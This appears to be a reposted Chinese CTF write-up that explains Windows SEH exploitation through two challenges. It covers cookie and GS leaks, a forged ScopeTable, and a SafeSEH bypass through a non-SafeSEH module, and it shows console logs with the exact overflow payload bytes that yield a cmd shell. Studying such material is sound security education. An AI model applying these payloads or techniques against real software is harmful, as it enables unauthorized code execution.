2. 程式人生 > >通過兩道題目理解windows的異常處理機制

通過兩道題目理解windows的異常處理機制

阿新 發佈:2019-01-04

關於windows異常處理機制最經典的文章應該是A Crash Course on the Depths of Win32™ Structured Exception Handling。強烈建議沒有讀過的讀者仔細閱讀這篇文章,這裡就不囉嗦了。
題目下載:https://github.com/k0keoyo/ctf_pwn

babystack

babystack這道題看上去攻擊面還是很明顯的,首先是一處棧溢位。
這裡寫圖片描述
GetInput是一個拷貝函式,拷貝的目標是v9所在的地址,這裡已經超過v9開闢的棧空間大小,會造成棧溢位。
這裡寫圖片描述
在函式入口,會直接列印目標棧地址和主函式地址,因此也不怕棧地址改變和ASLR了。
這裡寫圖片描述


在進入函式之後,如果輸入yes,v7為0,不會進入下面的if語句而是進入else語句,而這個else語句可以洩露記憶體地址中存放的內容;如果輸入no則退出;如果輸入非yes非no,則會引發棧溢位。輸入點有一個for迴圈,只有10次輸入的機會,因此如果我們要洩露任意地址記憶體的話,必須要洩露對利用有影響的記憶體值。
這裡寫圖片描述
而GetTargetAddress中返回值會通過atoi將想轉換的內容轉換成一個int型數字。所以這裡如果想得知地址的值的話,需要將目標地址的十六進位制轉換成十進位制輸入。
這裡寫圖片描述
同時程式中還隱藏著直接獲得互動shell的system("cmd"),在f5之後沒有顯示,因為在正常情況下jnz是一定會跳轉的,所以這裡應該是優化掉了。因此我們也不需要考慮DEP和shellcode了,如果能夠控制EIP,通過之前我們洩露出的函式地址,算出偏移,直接跳轉到system("cmd")
,就可以完成攻擊了。
這裡寫圖片描述
綜上我們把IDA F5之後的程式碼整理如下。
這裡寫圖片描述
這裡有個SEH,首先會想到用system("cmd")的地址通過緩衝區溢位覆蓋SEH的Handler,然後通過在GetTargetAddress輸入一個大數,導致其訪問無效記憶體引發異常,進而執行Handler。但是這裡是行不通的,因為程式開啟了SafeSEH,當我們用system("cmd")的地址覆蓋Handler因為地址是在主程式映像範圍,主程式又開了SafeSEH,會有SafeSEH Table,而system("cmd")的地址肯定不在表中,必定是要失敗的。2008年blackhat上Alex披露了有關SafeSEH的細節,如下所示。
這裡寫圖片描述

我們來看看函式開頭構造的SEH。
這裡寫圖片描述
VC的SEH佈局大致如下。
這裡寫圖片描述
這裡Exceptionhandler就是__except_handler4_except_handler4只是呼叫了except_handler4_common
這裡寫圖片描述
_except_handler4_common稍稍複雜了一點,不貼程式碼了,借用一張圖來說明。
這裡寫圖片描述
可以看到裡面有兩個地方,一個地方呼叫了ScopeTable裡的FilterFunc函式,一個地方呼叫了HandlerFunc函式。ScopeTable是被放在SEH Handler後面的,這裡我們可以偽造一個ScopeTable,把裡面的FilterFunc或者HandlerFunc改為system("cmd")的地址,然後把這個偽造的ScopeTable通過溢位覆蓋掉原ScopeTable。這裡還要注意_except_handler4_common中的ValidateLocalCookies會做驗證,所以也要把GS leak出來。
這裡寫圖片描述
因此最終我們構造的結構如下。
這裡寫圖片描述
這裡寫圖片描述
這裡寫圖片描述

C:\Python27\python.exe C:/Users/i-houjingyi/Downloads/babystack/test.py
ouch! Do not kill me , I will tell you everything
stack address = 0x48f8e8
main address = 0x2410b0
Do you want to know more?

>> yes
Where do you want to know

>> 2375684
Address 0x244004 value is 0x55d9053a(leak security cookie)
Do you want to know more?

>> yes
Where do you want to know

>> 4782440
Address 0x48f968 value is 0x5591fcbe(leak GS)
Do you want to know more?

>> 4782452

>> yes
Do you want to know more?

>> yes
Where do you want to know

>> 4782452
Address 0x48f974 value is 0x48f9bc(leak SHE next)
Do you want to know more?

>> noo

>> b"aaaa\xe4\xff\xff\xff\x00\x00\x00\x00\x20\xff\xff\xff\x00\x00\x00\x00\xfe\xff\xff\xff\x8d\x13\x24\x00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xbe\xfc\x91\x55aaaaaaaa\xbc\xf9\x48\x00\x60\x14\x24\x00\xd6\xfd\x91\x55"
Do you want to know more?

>> yes
Where do you want to know

>> 80000000

>> dir
Microsoft Windows [版本 6.1.7601]
版權所有 (c) 2009 Microsoft Corporation。保留所有權利。

C:\Users\i-houjingyi\Downloads\babystack>dir
 驅動器 C 中的卷沒有標籤。
 卷的序列號是 7AF2-3A02

 C:\Users\i-houjingyi\Downloads\babystack 的目錄

2017/10/09  14:45    <DIR>          .
2017/10/09  14:45    <DIR>          ..
2017/10/09  14:45                44 233.py
2017/07/24  14:16            10,752 babystack.exe
2017/10/09  10:12           172,032 babystack.id0
2017/10/09  10:12            49,152 babystack.id1
2017/10/09  10:12             1,507 babystack.id2
2017/09/30  18:10           241,569 babystack.idb
2017/10/09  10:12            16,384 babystack.nam
2017/10/09  10:12             2,197 babystack.til
2017/10/09  14:36                 0 fout.txt
2017/10/09  14:04               880 test.py
2017/08/22  10:56           918,304 ucrtbase.dll
2017/02/08  14:09            83,792 vcruntime140.dll
2017/10/09  10:17         1,409,024 vcruntime140.id0
2017/10/09  10:17           262,144 vcruntime140.id1
2017/10/09  10:17             1,144 vcruntime140.id2
2017/09/30  18:10         1,737,551 vcruntime140.idb
2017/10/09  10:17            16,384 vcruntime140.nam
2017/10/09  10:17            48,558 vcruntime140.til
              18 個檔案      4,971,418 位元組
               2 個目錄 13,687,795,712 可用位元組

C:\Users\i-houjingyi\Downloads\babystack>
>>

程式碼:
這裡寫圖片描述

babyshellcode

在題目主函式中,首先在scmgr.dll中會初始化存放shellcode的堆,呼叫的是VirtualAlloc函式,並且會列印堆地址。這裡VirtualAlloc中有一個引數是flprotect,值是0x40,表示擁有RWE許可權。
這裡寫圖片描述
同時,在scmgr.dll中還存在一處shell。
這裡寫圖片描述
在babyshellcode的main函式中提供了Create,List,Delete,Run,Set,Exit等功能。
這裡寫圖片描述
Create函式中會將shellcode拷貝到scmgr.dll初始化的堆空間裡。
這裡寫圖片描述
Run函式中byte_405448是一個全域性變數,它在決定了存放shellcode堆指標指向的shellcode前4位元組是否改成0xffffffff,這裡byte_405448的值是1,因此頭部會被修改,而我們也必須進入這裡,只有這裡才能造成溢位。然後呼叫VirtualAlloc出來的堆地址,進入堆地址後因為指令無效觸發異常。
這裡寫圖片描述
Set函式中有一系列複雜的加密,經過分析加密的就是init_scmgr的地址,但是加密演算法是不可逆的。
這裡寫圖片描述
另外scmgr.dll是一個未開啟safeseh的模組,可以直接通過od的OllySSEH功能看到SafeSEH的開啟狀態。
這裡寫圖片描述
在xp下利用堆指標來bypass safeseh只需要覆蓋SEH Handler為heap address+4,然後把shellcode跳過開頭4位元組編碼,頭4位元組放任意字串(反正會被編碼成0xffffffff),然後後面放shellcode的內容,應該就可以達到利用了。這也就是我們前面提到的RtlIsValidHandler函式中的最後一種情況,堆地址在當前程序載入記憶體映像空間之外且可執行。
這裡寫圖片描述
Win7及以上版本多了一個Check,內容是MEM_EXECUTE_OPTION_IMAGE_DISPATCH_ENABLE,它決定了是否允許在載入模組記憶體空間外執行。
這裡寫圖片描述
所以這種方法行不通,還是需要靠scmgr.dll。既然加密scmgr.dll基址的演算法不可逆,那就只有正向爆破了。爆破出基址之後令SEH Handler指向getshell_test就直接能獲得shell。
這裡寫圖片描述
這裡寫圖片描述

C:\Python27\python.exe C:/Users/i-houjingyi/Downloads/babyshellcode/test.py
Global memory alloc at 000F0000
Hey, Welcome to shellcode test system!
leave your name

>> hjy
hello hjy
1. Create shellcode
2. List shellcodes
3. Delete shellcode
4. Run shellcode
5. Set ShellcodeGuard
0. Exit
Option:

>> 5
1. Disable ShellcodeGuard
2. Enable ShellcodeGuard
Option:

>> 1
Your challenge code is 3473931e-4c885c33-72d30201-5d80c1f3-2280ec60-e6b7e4e7
challenge response:

0x651f1090
>> 1
respose wrong!
1. Create shellcode
2. List shellcodes
3. Delete shellcode
4. Run shellcode
5. Set ShellcodeGuard
0. Exit
Option:

>> 1
shellcode size:

>> 120
shellcode name:

>> hjy
shellcode description:

>> hjy
shellcode:

>> b"11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\x00\x11\x1f\x65"
Create shell code done, shellcode idx=0
1. Create shellcode
2. List shellcodes
3. Delete shellcode
4. Run shellcode
5. Set ShellcodeGuard
0. Exit
Option:

>> 4
shellcode index:

>> 0

>> dir
Microsoft Windows [版本 6.1.7601]
版權所有 (c) 2009 Microsoft Corporation。保留所有權利。

C:\Users\i-houjingyi\Downloads\babyshellcode>dir
 驅動器 C 中的卷沒有標籤。
 卷的序列號是 7AF2-3A02

 C:\Users\i-houjingyi\Downloads\babyshellcode 的目錄

2017/10/10  09:59    <DIR>          .
2017/10/10  09:59    <DIR>          ..
2017/10/09  18:15             2,407 1.py
2017/10/09  14:45                44 233.py
2017/07/24  14:16            13,824 babyshellcode.exe
2017/10/10  09:56           262,144 babyshellcode.id0
2017/10/10  09:56            57,344 babyshellcode.id1
2017/10/10  09:56             1,129 babyshellcode.id2
2017/10/09  19:35           340,739 babyshellcode.idb
2017/10/10  09:56            16,384 babyshellcode.nam
2017/10/10  09:56             3,441 babyshellcode.til
2017/10/10  11:14                 0 fout.txt
2017/07/19  17:24             8,704 scmgr.dll
2017/10/10  09:59           155,648 scmgr.id0
2017/10/10  09:59            40,960 scmgr.id1
2017/10/10  09:59             1,213 scmgr.id2
2017/10/09  19:35           217,193 scmgr.idb
2017/10/10  09:59            16,384 scmgr.nam
2017/10/10  09:59             2,691 scmgr.til
2017/10/09  19:34             2,558 test.py
2017/08/22  10:45           918,304 ucrtbase.dll
2017/02/08  14:09            83,792 vcruntime140.dll
              20 個檔案      2,144,903 位元組
               2 個目錄 13,387,833,344 可用位元組

C:\Users\i-houjingyi\Downloads\babyshellcode>
>>

相關推薦

通過題目理解windows異常處理機制

關於windows異常處理機制最經典的文章應該是A Crash Course on the Depths of Win32™ Structured Exception Handling。強烈建議沒有讀過的讀者仔細閱讀這篇文章,這裡就不囉嗦了。 題目下載:htt

深入理解Java異常處理機制 (籠統篇)

throw 種類型 綜合 IV 算術 其它 wid all 作用 開篇 1.異常處理(Exception Handling):   就是一種解決這一問題的機制,能夠較好地處理程序不能正常運行的情況。 2.異常(Exception):   是程序在運行時可能出現的

Java基礎:深入理解java異常處理機制的原理和開發應用【轉載】

Java異常處理機制在日常開發中應用頻繁,本篇文章主要在基礎的使用方法上,更進一步的,如何更加合理的使用異常機制,希望可以對各位朋友能有所幫助。   Java異常處理機制其最主要的幾個關鍵字:try、catch、finally、throw、throws,以及各種各樣

深入理解Java異常處理機制

final 語句 什麽 ror instance 說明 security 捕獲 分享圖片 一、引子   try…catch…finally恐怕是大家再熟悉不過的語句了,而且感覺用起來也是很簡單,邏輯上似乎也是很容易理解。不過,我親自體驗的&ld

windows 異常處理中VEH、SEH、UEH、VCH 之間的關系

異常1.當異常交由用戶處理時,按照以下順序調用異常處理方式VEH-〉SEH-〉VCH 。2.當VEH表示處理了異常,就不會傳遞給SEH,但是會傳遞異常給VCH 。3.當VEH沒有處理了,就會傳遞給SEH。4.當SEH的所有異常處理函數沒能夠處理異常,會調用默認的SEH(就是UEH,只是方式屬於SEH)處理函數

題目——湊14和壓縮0和1組成的陣列

1.實現一個函式 湊14 :輸入很多個整數(1<=數值<=13)任意兩個數相加等於14就可以從陣列中刪除這兩個數,求剩餘數(從小到大排列);比如輸入{9,1,9,7,5,13 } 輸出 {7,9};        用兩個指標變數一頭一尾,同時遍

CodeUp中關於vector的題目

兩道題大同小異 直接寫在一起了 問題 A: Course List for Student (25) 問題 B: Student List for Course (25) 題目連結 http://codeup.cn/contest.php?cid=100000

C++及Windows異常處理(try,catch; __try,__finally; __try, __except)

C++及Windows異常處理(try,catch; __try,__finally; __try, __except) 題目: int* p = 0x00000000; // pointer to NULL puts( "hello "); __try{ puts( "

Windows異常處理

對異常處理的研究不夠多,這個也源於工作中專案框架一般比較完善的原因,總結一下Windows下C++開發中常用的異常處理方式: 1. 語言自帶異常邏輯 try catch,這個應該是最熟悉的了。C++支援的方式,跨平臺。不足的地方在於只能捕獲語言的異常,就是有有刻意在邏輯中throw出來的。

C++及Windows異常處理(try,catch; __try,__finally; __try, __except)——一道筆試題引起的探究

轉載自 http://www.blogbus.com/shijuanfeng-logs/178616871.html 題目: int* p = 0x00000000; // pointer to NULL put

使用SpringBoot通過自定義註解+AOP+全域性異常處理實現引數統一非空校驗

一、前言         在我們寫後臺介面時,難免對引數進行非空校驗,如果一兩個還好,但如果需要寫大量的介面,及必填引數太多的時候,會給我們開發帶來大量的重複工作,及很多相似程式碼。而sping自帶的@RequestParam註解並不能完全滿足我們的需求,因為

windows 異常處理

為了程式的健壯性,windows 中提供了異常處理機制,稱為結構化異常,異常一般分為硬體異常和軟體異常,硬體異常一般是指在執行機器指令時發生的異常,比如試圖向一個擁有隻讀保護的頁面寫入內容,或者是硬體的除0錯誤等等,而軟體異常則是由程式設計師,呼叫RaiseEx

windows異常處理 __try __except

try-except用法   try except是windows 系統獨有的異常處理模型,windows的異常處理模式,稱為SEH( structured exception handling ),        SEH的異常處理模型主要由try-except語句來完成,與

輸入任意個整數,求兩者的商。使用異常處理機制捕獲零除異常和引數格式異常

using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace Con

學習java異常處理機制個人的一些理解

學習java已經比較久一段時間了,其實對於java異常這方面的知識只停留在javac讓我throws一下或trycatch一下我就直接做了,其實並沒有真的瞭解整個java的異常處理機制是怎樣的,這幾天就深入的去了解了異常處理機制,下面我講一下對於java異常處理機制的一些個人

從零開始理解JAVA事件處理機制(2)

extend nds 接下來 htm ref param 簡單 tostring ansi 第一節中的示例過於簡單《從零開始理解JAVA事件處理機制(1)》,簡單到讓大家覺得這樣的代碼簡直毫無用處。但是沒辦法,我們要繼續寫這毫無用處的代碼,然後引出下一階段真正有益的代碼。

C語言中的異常處理機制

軟件測試 如何實現 char* oar 朋友 核心 初始化 flag out #define try if(!setjmp(Jump_Buffer)) 返回try現場後重新執行判斷,所以有兩次執行。 http://blog.csdn.net/tian_dao_chou_q

七、異常處理——2-異常處理機制

left ron text pan 異常處理機制 異常類 捕獲異常 p s 捕獲 2-異常處理機制 1.使用try...catch捕獲異常 2.異常類的繼承體系七、異常處理——2-異常處理機制

C#進階--WebApi異常處理機制

str with 分配 客戶 來看 stack 統一 releases 全局配置 其實對於C#異常處理大家都不陌生,但是對於在WeiApi上的異常處理實際上也和傳統異常處理區別不大,但是卻經過封裝可以讓異常更加友好,https://docs

java中異常處理機制 throw拋出自定義業務邏輯異常 throws繼續拋出 catch捕獲後會自動繼續拋向調用方法

異常處理機制 ... cep super finally sta exc ace 避免 package com.swift; public class Exception_TestC { public static void main(String[] arg